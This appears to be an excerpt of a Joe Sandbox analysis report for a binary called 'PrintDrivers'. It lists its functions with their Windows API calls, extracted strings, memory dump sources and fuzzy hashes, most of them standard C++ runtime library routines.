                                                                      • Part of subcall function 005963BD: __EH_prolog3.LIBCMT ref: 005963C4
                                                                      • Part of subcall function 005963BD: std::_Lockit::_Lockit.LIBCPMT ref: 005963CE
                                                                      • Part of subcall function 005963BD: std::_Lockit::~_Lockit.LIBCPMT ref: 0059643F
                                                                      • Part of subcall function 00596328: __EH_prolog3.LIBCMT ref: 0059632F
                                                                      • Part of subcall function 00596328: std::_Lockit::_Lockit.LIBCPMT ref: 00596339
                                                                      • Part of subcall function 00596328: std::_Lockit::~_Lockit.LIBCPMT ref: 005963AA
                                                                    • collate.LIBCPMT ref: 0059B362
                                                                    • numpunct.LIBCPMT ref: 0059B60C
                                                                    • __Getcoll.LIBCPMT ref: 0059B3A4
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                      • Part of subcall function 00586010: LocalAlloc.KERNEL32(00000040,?,005943F0,00000020,?,?,005890A2,00000000,F3F544E4,?,?,?,?,005C6D1D,000000FF), ref: 00586016
                                                                    • codecvt.LIBCPMT ref: 0059B6CA
                                                                      • Part of subcall function 0059673B: __EH_prolog3.LIBCMT ref: 00596742
                                                                      • Part of subcall function 0059673B: std::_Lockit::_Lockit.LIBCPMT ref: 0059674C
                                                                      • Part of subcall function 0059673B: std::_Lockit::~_Lockit.LIBCPMT ref: 005967BD
                                                                      • Part of subcall function 00596865: __EH_prolog3.LIBCMT ref: 0059686C
                                                                      • Part of subcall function 00596865: std::_Lockit::_Lockit.LIBCPMT ref: 00596876
                                                                      • Part of subcall function 00596865: std::_Lockit::~_Lockit.LIBCPMT ref: 005968E7
                                                                      • Part of subcall function 00595CC1: __EH_prolog3.LIBCMT ref: 00595CC8
                                                                      • Part of subcall function 00595CC1: std::_Lockit::_Lockit.LIBCPMT ref: 00595CD2
                                                                      • Part of subcall function 00595CC1: std::_Lockit::~_Lockit.LIBCPMT ref: 00595D43
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatectypenumpunct
                                                                    • String ID:
                                                                    • API String ID: 3494022857-0
                                                                    • Opcode ID: 08ffe9255ac5179e4b62e17322a754fc186c824c7f9473ed8c61afc26052a43d
                                                                    • Instruction ID: 14e69fd748de69387f48e0daa409f642837ed0f997631bee7fbedb2d485cb8fb
                                                                    • Opcode Fuzzy Hash: 08ffe9255ac5179e4b62e17322a754fc186c824c7f9473ed8c61afc26052a43d
                                                                    • Instruction Fuzzy Hash: BCE19171804216ABEF207F619D4EABF3EA5FF81750F14442DF84567281DBB54D10A7E2
                                                                    Function 005C294B Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 005C2993
                                                                    • __fassign.LIBCMT ref: 005C2B78
                                                                    • __fassign.LIBCMT ref: 005C2B95
                                                                    • WriteFile.KERNEL32(?,00000010,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005C2BDD
                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 005C2C1D
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 005C2CC5
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                    • String ID:
                                                                    • API String ID: 1735259414-0
                                                                    • Opcode ID: bc224005bb14cc68adb53d599c4ad46db12e69432cd2ec6d8adf5f8b0a0a6024
                                                                    • Instruction ID: 6647b3de3a184c8a2fbea9e5187794fe39f90f48e88374e3b948f3bdbb0ecf17
                                                                    • Opcode Fuzzy Hash: bc224005bb14cc68adb53d599c4ad46db12e69432cd2ec6d8adf5f8b0a0a6024
                                                                    • Instruction Fuzzy Hash: 74C18A75D002599FCF14CFE8C884AEDBFB5BF59304F28416AE855BB242D631AD46CB60
                                                                    Function 005B11B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 375COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$__alloca_probe_16
                                                                    • String ID: a/p$am/pm
                                                                    • API String ID: 3509577899-3206640213
                                                                    • Opcode ID: e7f297e107e3922a7c18011ed40dc2c7b8bb96b82d96ae16707d58e8181017ea
                                                                    • Instruction ID: 45df135ebca8fdaa4d1be7056b9347d9d190c45b18956ea9f74d9cda0814277c
                                                                    • Opcode Fuzzy Hash: e7f297e107e3922a7c18011ed40dc2c7b8bb96b82d96ae16707d58e8181017ea
                                                                    • Instruction Fuzzy Hash: 44C1E835900A16CACFA48F68C5A5AFABFB0FF46700FA44559E403AB690D331BD41CB69
                                                                    Function 00585790 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,?,00000000,00585578), ref: 00585798
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast
                                                                    • String ID: Call to ShellExecuteEx() returned:$Last error=$Tv]$false$true
                                                                    • API String ID: 1452528299-3232076712
                                                                    • Opcode ID: 28fa5e2cc42161a48a00ce64d947a60e2adda784582e930c66cdb55b2f7973c3
                                                                    • Instruction ID: 36d946103943dee51c55a9910eeebf210d8e6cefb8d1aa02e03fe12db5c1e216
                                                                    • Opcode Fuzzy Hash: 28fa5e2cc42161a48a00ce64d947a60e2adda784582e930c66cdb55b2f7973c3
                                                                    • Instruction Fuzzy Hash: 8211CE65A1062687CB302F2C9804336AAE4FF54751F65547FDC89E7391F6B58C8183C0
                                                                    Function 005A7D7C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,005A7D73,005A67A0,005A542E), ref: 005A7D8A
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005A7D98
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005A7DB1
                                                                    • SetLastError.KERNEL32(00000000,005A7D73,005A67A0,005A542E), ref: 005A7E03
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: 9052b9ef3d623363b0ca6dcb76fb6ebb6aaaed8bfc2cd57b7c6aa5836e80c550
                                                                    • Instruction ID: fd174ae98353488906fede0650391db288442f5f2b52b5015c055315b5e09535
                                                                    • Opcode Fuzzy Hash: 9052b9ef3d623363b0ca6dcb76fb6ebb6aaaed8bfc2cd57b7c6aa5836e80c550
                                                                    • Instruction Fuzzy Hash: 5701D43220D6179EA73527747C8EA7F2F98FF67374724423BF412562E2EE914C05A240
                                                                    Function 00583110 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 259fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTempFileNameW.KERNEL32(?,URL,00000000,?,F3F544E4), ref: 00583174
                                                                    • MoveFileW.KERNEL32(?,00000000), ref: 00583402
                                                                    • DeleteFileW.KERNEL32(?), ref: 0058344A
                                                                      • Part of subcall function 00582D40: LocalFree.KERNEL32(?,F3F544E4,?,?,005C5A40,000000FF,?,005811E2,F3F544E4,?,?,005C5A75,000000FF), ref: 00582D91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: File$DeleteFreeLocalMoveNameTemp
                                                                    • String ID: URL$url
                                                                    • API String ID: 1622375482-346267919
                                                                    • Opcode ID: eaeb6c6eb507c6d01968e0f7fbd6529bda5ab57bc252774b2719e3b54c43e4a6
                                                                    • Instruction ID: 438f572adbc05e397aa5aaa350537c4d0dff8f722b69ecca967bb2df524b2210
                                                                    • Opcode Fuzzy Hash: eaeb6c6eb507c6d01968e0f7fbd6529bda5ab57bc252774b2719e3b54c43e4a6
                                                                    • Instruction Fuzzy Hash: 13C15970914669DACB24EF28CC9CBDDBBB4BF54704F1046D9D809A7291EB74AB84CF90
                                                                    Function 00583580 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 005835E5
                                                                    • GetLastError.KERNEL32(?,?,?,005C5F75,000000FF), ref: 005836CA
                                                                      • Part of subcall function 00582410: GetProcessHeap.KERNEL32 ref: 00582465
                                                                      • Part of subcall function 00583E60: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,00583628,-00000010,?,?,?,005C5F75,000000FF), ref: 00583EA6
                                                                    • _wcschr.LIBVCRUNTIME ref: 00583676
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,005C5F75,000000FF), ref: 0058368B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
                                                                    • String ID: ntdll.dll
                                                                    • API String ID: 3941625479-2227199552
                                                                    • Opcode ID: 47f57c32980bff155a2cb75729abec04e5d714d1ccd378c349ee2579b7a74fe6
                                                                    • Instruction ID: c2b6f3da91c0205e2bc4d4dad303bd54b9087987f17feef1dbe0909811f80de6
                                                                    • Opcode Fuzzy Hash: 47f57c32980bff155a2cb75729abec04e5d714d1ccd378c349ee2579b7a74fe6
                                                                    • Instruction Fuzzy Hash: 0541A471600606AFDB10EF69CC49BAEBBA4FF54710F14452AED16E7281EB70AA04CF50
                                                                    Function 00585EF9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 83libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00581920: LocalFree.KERNEL32(?), ref: 00581942
                                                                      • Part of subcall function 005A5D0D: RaiseException.KERNEL32(E06D7363,00000001,00000003,00581AC0,?,?,005909D1,00581AC0,005DC0B0,?,00581AC0), ref: 005A5D6D
                                                                      • Part of subcall function 00582B10: LocalAlloc.KERNEL32(00000040,005DD827,005DD804,005DD804), ref: 00582B49
                                                                    • GetCurrentProcess.KERNEL32(F3F544E4,F3F544E4,?,?,00000000,005C6641,000000FF), ref: 00585FCB
                                                                      • Part of subcall function 005A4B23: EnterCriticalSection.KERNEL32(005E0D24,?,?,?,005824B6,005E1620,F3F544E4,?,?,005C5B3D,000000FF), ref: 005A4B2E
                                                                      • Part of subcall function 005A4B23: LeaveCriticalSection.KERNEL32(005E0D24,?,?,?,005824B6,005E1620,F3F544E4,?,?,005C5B3D,000000FF), ref: 005A4B6B
                                                                    • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00585F90
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00585F97
                                                                      • Part of subcall function 005A4AD9: EnterCriticalSection.KERNEL32(005E0D24,?,?,00582527,005E1620,005C87A0), ref: 005A4AE3
                                                                      • Part of subcall function 005A4AD9: LeaveCriticalSection.KERNEL32(005E0D24,?,?,00582527,005E1620,005C87A0), ref: 005A4B16
                                                                      • Part of subcall function 005A4AD9: RtlWakeAllConditionVariable.NTDLL ref: 005A4B8D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeaveLocal$AddressAllocConditionCurrentExceptionFreeHandleModuleProcProcessRaiseVariableWake
                                                                    • String ID: IsWow64Process$kernel32
                                                                    • API String ID: 591782615-3789238822
                                                                    • Opcode ID: 174adabde2e06b840aa610596f3c4fde1ff1e215d3057a0476aa5a7a6fefdb6f
                                                                    • Instruction ID: aac667dfb36d15f21884e1826be9b131824d578a2c7648f24b673b89c6951d07
                                                                    • Opcode Fuzzy Hash: 174adabde2e06b840aa610596f3c4fde1ff1e215d3057a0476aa5a7a6fefdb6f
                                                                    • Instruction Fuzzy Hash: E121F371900A85DFDB10EFA4DD4AFAD7BB8FB14710F040226E912AB690E770A904DB65
                                                                    Function 0059AC69 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Mpunct$GetvalsH_prolog3
                                                                    • String ID: $+xv
                                                                    • API String ID: 2204710431-1686923651
                                                                    • Opcode ID: 71e7fe95c3ea9406c084ca6e5043c9c9413cb3c5fdb9578697c4aca3004bc746
                                                                    • Instruction ID: 3fbfc0996de4a4dce14d4c0df0c466d93e6c99f1315250dc1551e8c876452f76
                                                                    • Opcode Fuzzy Hash: 71e7fe95c3ea9406c084ca6e5043c9c9413cb3c5fdb9578697c4aca3004bc746
                                                                    • Instruction Fuzzy Hash: C82171B1504A566EDB21DF74848477BBEE8BB49300B04091AF499C7A42E734EA05CBE1
                                                                    Function 005A8E22 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,005A8EE3,?,?,005E0DB4,00000000,?,005A9010,00000004,InitializeCriticalSectionEx,005CC8CC,005CC8D4,00000000), ref: 005A8EB2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID: api-ms-
                                                                    • API String ID: 3664257935-2084034818
                                                                    • Opcode ID: 171376306877ebd52e295339293babe4f7dc9c1121a35171a5a264bea680bb03
                                                                    • Instruction ID: 30d9b07324b990d8d799c6f41b130a89d077b9aeae548ba0ab1bd2e342923727
                                                                    • Opcode Fuzzy Hash: 171376306877ebd52e295339293babe4f7dc9c1121a35171a5a264bea680bb03
                                                                    • Instruction Fuzzy Hash: 4811A332A01631EBDF225B68AC49B6EBF9CBF12760F250560E915EB280DB70ED04D6D4
                                                                    Function 00585F30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(F3F544E4,F3F544E4,?,?,00000000,005C6641,000000FF), ref: 00585FCB
                                                                      • Part of subcall function 005A4B23: EnterCriticalSection.KERNEL32(005E0D24,?,?,?,005824B6,005E1620,F3F544E4,?,?,005C5B3D,000000FF), ref: 005A4B2E
                                                                      • Part of subcall function 005A4B23: LeaveCriticalSection.KERNEL32(005E0D24,?,?,?,005824B6,005E1620,F3F544E4,?,?,005C5B3D,000000FF), ref: 005A4B6B
                                                                    • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00585F90
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00585F97
                                                                      • Part of subcall function 005A4AD9: EnterCriticalSection.KERNEL32(005E0D24,?,?,00582527,005E1620,005C87A0), ref: 005A4AE3
                                                                      • Part of subcall function 005A4AD9: LeaveCriticalSection.KERNEL32(005E0D24,?,?,00582527,005E1620,005C87A0), ref: 005A4B16
                                                                      • Part of subcall function 005A4AD9: RtlWakeAllConditionVariable.NTDLL ref: 005A4B8D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                    • String ID: IsWow64Process$kernel32
                                                                    • API String ID: 2056477612-3789238822
                                                                    • Opcode ID: fe94c5da21f8a9f8e1b5f31f8de98886d8be41881bb6d70e09e1c619fa879f71
                                                                    • Instruction ID: daca7f6024492a5f3184353af5bb266429728ff9a127db127dc4369e3b6e42e7
                                                                    • Opcode Fuzzy Hash: fe94c5da21f8a9f8e1b5f31f8de98886d8be41881bb6d70e09e1c619fa879f71
                                                                    • Instruction Fuzzy Hash: A41124B2904A88DFDB20CF94DD49FA9BBB8F714720F04022AEC16A7780E774A904CB54
                                                                    Function 005B3CC6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,005B3CBB,00588D68,?,005B3C83,?,?,00588D68), ref: 005B3CDB
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005B3CEE
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,005B3CBB,00588D68,?,005B3C83,?,?,00588D68), ref: 005B3D11
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: e99916710e7d4df3d8d8bd1c10f256e84417096e441fff83ea7c55d6ffd0f370
                                                                    • Instruction ID: 77ed65314edb674d2575855c18b11ff73b1c8b0087460ac78b1c3f7508209db6
                                                                    • Opcode Fuzzy Hash: e99916710e7d4df3d8d8bd1c10f256e84417096e441fff83ea7c55d6ffd0f370
                                                                    • Instruction Fuzzy Hash: 7EF01C35A00619FFDB119B91DD0EFDE7E68FF20B96F5440A4A901B21A0DB719F44EB90
                                                                    Function 005A4BAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SleepConditionVariableCS.KERNELBASE(?,005A4B48,00000064), ref: 005A4BCE
                                                                    • LeaveCriticalSection.KERNEL32(005E0D24,?,?,005A4B48,00000064,?,?,?,005824B6,005E1620,F3F544E4,?,?,005C5B3D,000000FF), ref: 005A4BD8
                                                                    • WaitForSingleObjectEx.KERNEL32(?,00000000,?,005A4B48,00000064,?,?,?,005824B6,005E1620,F3F544E4,?,?,005C5B3D,000000FF), ref: 005A4BE9
                                                                    • EnterCriticalSection.KERNEL32(005E0D24,?,005A4B48,00000064,?,?,?,005824B6,005E1620,F3F544E4,?,?,005C5B3D,000000FF), ref: 005A4BF0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                    • String ID: $^
                                                                    • API String ID: 3269011525-4185404816
                                                                    • Opcode ID: 87a0bdf0ef542fa28d4bc9d42bb1d53111feff6340d7ae9227b8d16dfe40dabc
                                                                    • Instruction ID: dfe6150d874a2b1abd94289dbce94f762eee6bc60794f9539fe4beeb5ca36ac7
                                                                    • Opcode Fuzzy Hash: 87a0bdf0ef542fa28d4bc9d42bb1d53111feff6340d7ae9227b8d16dfe40dabc
                                                                    • Instruction Fuzzy Hash: D4E06D32501568FFCE061BD1ED0CE8D3F64FB19B11B006060F949661A0CAA16894ABE1
                                                                    Function 00589590 Relevance: 7.8, APIs: 5, Instructions: 321COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _swprintf$FreeLocal
                                                                    • String ID:
                                                                    • API String ID: 2429749586-0
                                                                    • Opcode ID: 8fd5d730a6c1c7ff15bc0b820917f50cc783cae4340aabe4b791fa5a9abe1d50
                                                                    • Instruction ID: dfec0ef6074a2b2b3f37cfb57f8939de7bfa5ac9d68d388175583de93acce75b
                                                                    • Opcode Fuzzy Hash: 8fd5d730a6c1c7ff15bc0b820917f50cc783cae4340aabe4b791fa5a9abe1d50
                                                                    • Instruction Fuzzy Hash: 38C1AD71A00209AFDF15EFA4DC55BAEBBB9FF49300F04462AF811AB281D735A954CB90
                                                                    Function 005B7B22 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __alloca_probe_16.LIBCMT ref: 005B7BA6
                                                                    • __alloca_probe_16.LIBCMT ref: 005B7C6C
